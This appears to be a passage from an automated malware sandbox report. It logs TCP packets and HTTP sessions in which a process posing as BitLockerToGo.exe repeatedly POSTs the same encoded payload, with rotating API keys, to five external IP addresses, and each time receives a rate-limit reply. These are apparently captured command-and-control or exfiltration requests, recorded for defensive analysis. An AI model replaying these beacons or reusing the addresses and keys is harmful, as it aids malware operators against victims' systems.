                                          Oct 18, 2024 14:03:41.055577040 CEST4982180192.168.2.491.212.166.91
                                          Oct 18, 2024 14:03:42.205930948 CEST8049827188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:03:42.206183910 CEST4982780192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:03:42.206233025 CEST4982180192.168.2.491.212.166.91
                                          Oct 18, 2024 14:03:42.206264973 CEST4981580192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:42.206305027 CEST4980980192.168.2.446.8.236.61
                                          Oct 18, 2024 14:03:42.206331968 CEST4980380192.168.2.446.8.232.106
                                          Oct 18, 2024 14:03:42.212474108 CEST8049827188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:03:42.212532043 CEST4982780192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:03:42.212682009 CEST804982191.212.166.91192.168.2.4
                                          Oct 18, 2024 14:03:42.212692976 CEST804981593.185.159.253192.168.2.4
                                          Oct 18, 2024 14:03:42.212733030 CEST4982180192.168.2.491.212.166.91
                                          Oct 18, 2024 14:03:42.212742090 CEST4981580192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:42.213545084 CEST804980946.8.236.61192.168.2.4
                                          Oct 18, 2024 14:03:42.213557959 CEST804980346.8.232.106192.168.2.4
                                          Oct 18, 2024 14:03:42.213586092 CEST4980980192.168.2.446.8.236.61
                                          Oct 18, 2024 14:03:42.213613033 CEST4980380192.168.2.446.8.232.106
                                          Oct 18, 2024 14:04:12.209561110 CEST5000080192.168.2.446.8.232.106
                                          Oct 18, 2024 14:04:12.214560032 CEST805000046.8.232.106192.168.2.4
                                          Oct 18, 2024 14:04:12.214721918 CEST5000080192.168.2.446.8.232.106
                                          Oct 18, 2024 14:04:12.215013027 CEST5000080192.168.2.446.8.232.106
                                          Oct 18, 2024 14:04:12.219790936 CEST805000046.8.232.106192.168.2.4
                                          Oct 18, 2024 14:04:13.072570086 CEST805000046.8.232.106192.168.2.4
                                          Oct 18, 2024 14:04:13.126501083 CEST5000080192.168.2.446.8.232.106
                                          Oct 18, 2024 14:04:13.243434906 CEST5000580192.168.2.446.8.236.61
                                          Oct 18, 2024 14:04:13.248312950 CEST805000546.8.236.61192.168.2.4
                                          Oct 18, 2024 14:04:13.248421907 CEST5000580192.168.2.446.8.236.61
                                          Oct 18, 2024 14:04:13.290038109 CEST5000580192.168.2.446.8.236.61
                                          Oct 18, 2024 14:04:13.295042038 CEST805000546.8.236.61192.168.2.4
                                          Oct 18, 2024 14:04:14.116594076 CEST805000546.8.236.61192.168.2.4
                                          Oct 18, 2024 14:04:14.118247032 CEST5001180192.168.2.493.185.159.253
                                          Oct 18, 2024 14:04:14.123100996 CEST805001193.185.159.253192.168.2.4
                                          Oct 18, 2024 14:04:14.123290062 CEST5001180192.168.2.493.185.159.253
                                          Oct 18, 2024 14:04:14.123522043 CEST5001180192.168.2.493.185.159.253
                                          Oct 18, 2024 14:04:14.128346920 CEST805001193.185.159.253192.168.2.4
                                          Oct 18, 2024 14:04:14.170701981 CEST5000580192.168.2.446.8.236.61
                                          Oct 18, 2024 14:04:14.984178066 CEST805001193.185.159.253192.168.2.4
                                          Oct 18, 2024 14:04:14.985927105 CEST5001780192.168.2.491.212.166.91
                                          Oct 18, 2024 14:04:14.990986109 CEST805001791.212.166.91192.168.2.4
                                          Oct 18, 2024 14:04:14.991105080 CEST5001780192.168.2.491.212.166.91
                                          Oct 18, 2024 14:04:14.991453886 CEST5001780192.168.2.491.212.166.91
                                          Oct 18, 2024 14:04:14.996853113 CEST805001791.212.166.91192.168.2.4
                                          Oct 18, 2024 14:04:15.038647890 CEST5001180192.168.2.493.185.159.253
                                          Oct 18, 2024 14:04:15.922864914 CEST805001791.212.166.91192.168.2.4
                                          Oct 18, 2024 14:04:15.960284948 CEST5002180192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:04:15.965204954 CEST8050021188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:04:15.965285063 CEST5002180192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:04:15.966000080 CEST5002180192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:04:15.970937014 CEST8050021188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:04:15.982233047 CEST5001780192.168.2.491.212.166.91
                                          Oct 18, 2024 14:04:16.959208965 CEST8050021188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:04:16.959577084 CEST5002180192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:04:16.959614038 CEST5001780192.168.2.491.212.166.91
                                          Oct 18, 2024 14:04:16.959657907 CEST5001180192.168.2.493.185.159.253
                                          Oct 18, 2024 14:04:16.959742069 CEST5000580192.168.2.446.8.236.61
                                          Oct 18, 2024 14:04:16.959784031 CEST5000080192.168.2.446.8.232.106
                                          Oct 18, 2024 14:04:16.964977026 CEST8050021188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:04:16.965081930 CEST5002180192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:04:16.965904951 CEST805001791.212.166.91192.168.2.4
                                          Oct 18, 2024 14:04:16.965970993 CEST805001193.185.159.253192.168.2.4
                                          Oct 18, 2024 14:04:16.965969086 CEST5001780192.168.2.491.212.166.91
                                          Oct 18, 2024 14:04:16.965985060 CEST805000546.8.236.61192.168.2.4
                                          Oct 18, 2024 14:04:16.965998888 CEST805000046.8.232.106192.168.2.4
                                          Oct 18, 2024 14:04:16.966048956 CEST5001180192.168.2.493.185.159.253
                                          Oct 18, 2024 14:04:16.966059923 CEST5000580192.168.2.446.8.236.61
                                          Oct 18, 2024 14:04:16.966078043 CEST5000080192.168.2.446.8.232.106

                                          HTTP Request Dependency Graph

                                          • 46.8.232.106
                                          • 46.8.236.61
                                          • 93.185.159.253
                                          • 91.212.166.91
                                          • 188.130.206.243

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.44974146.8.232.106807652C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 18, 2024 14:03:03.007747889 CEST298OUTPOST / HTTP/1.1
                                          Host: 46.8.232.106
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: X2qB4QsF
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:03.851664066 CEST183INHTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:03 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.44974246.8.236.61807652C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 18, 2024 14:03:03.859328032 CEST297OUTPOST / HTTP/1.1
                                          Host: 46.8.236.61
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: Gr3WMKTB
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:04.725080967 CEST183INHTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:04 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.44974393.185.159.253807652C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 18, 2024 14:03:04.732546091 CEST300OUTPOST / HTTP/1.1
                                          Host: 93.185.159.253
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: bxqWLRuT
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:05.599980116 CEST183INHTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:05 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.44974491.212.166.91807652C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 18, 2024 14:03:05.606853962 CEST299OUTPOST / HTTP/1.1
                                          Host: 91.212.166.91
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: wVwZRp3X
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:06.515130997 CEST183INHTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:06 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.449745188.130.206.243807652C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 18, 2024 14:03:06.521856070 CEST301OUTPOST / HTTP/1.1
                                          Host: 188.130.206.243
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: M3s2yoni
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:07.374522924 CEST183INHTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:07 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.44980346.8.232.106807652C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 18, 2024 14:03:37.382446051 CEST298OUTPOST / HTTP/1.1
                                          Host: 46.8.232.106
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: SUn6zhye
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:38.261029005 CEST183INHTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:38 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.44980946.8.236.61807652C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 18, 2024 14:03:38.267755985 CEST297OUTPOST / HTTP/1.1
                                          Host: 46.8.236.61
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: 7gRihgA6
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:39.119452000 CEST183INHTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:38 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.44981593.185.159.253807652C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 18, 2024 14:03:39.126230001 CEST300OUTPOST / HTTP/1.1
                                          Host: 93.185.159.253
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: sCmLPLmp
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:40.064974070 CEST183INHTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:39 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.44982191.212.166.91807652C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 18, 2024 14:03:40.071691990 CEST299OUTPOST / HTTP/1.1
                                          Host: 91.212.166.91
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: qlZCu38t
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:41.001111984 CEST183INHTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:40 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          9192.168.2.449827188.130.206.243807652C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 18, 2024 14:03:41.008100986 CEST301OUTPOST / HTTP/1.1
                                          Host: 188.130.206.243
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: zbNBhDll
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:42.205930948 CEST183INHTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:42 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          10192.168.2.45000046.8.232.106807652C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 18, 2024 14:04:12.215013027 CEST298OUTPOST / HTTP/1.1
                                          Host: 46.8.232.106
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: pXRqnRHQ
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:04:13.072570086 CEST183INHTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:04:12 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          11192.168.2.45000546.8.236.61807652C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 18, 2024 14:04:13.290038109 CEST297OUTPOST / HTTP/1.1
                                          Host: 46.8.236.61
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: ieY9bnDS
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:04:14.116594076 CEST183INHTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:04:13 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          12192.168.2.45001193.185.159.253807652C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 18, 2024 14:04:14.123522043 CEST300OUTPOST / HTTP/1.1
                                          Host: 93.185.159.253
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: GRI3r7kS
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:04:14.984178066 CEST183INHTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:04:14 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
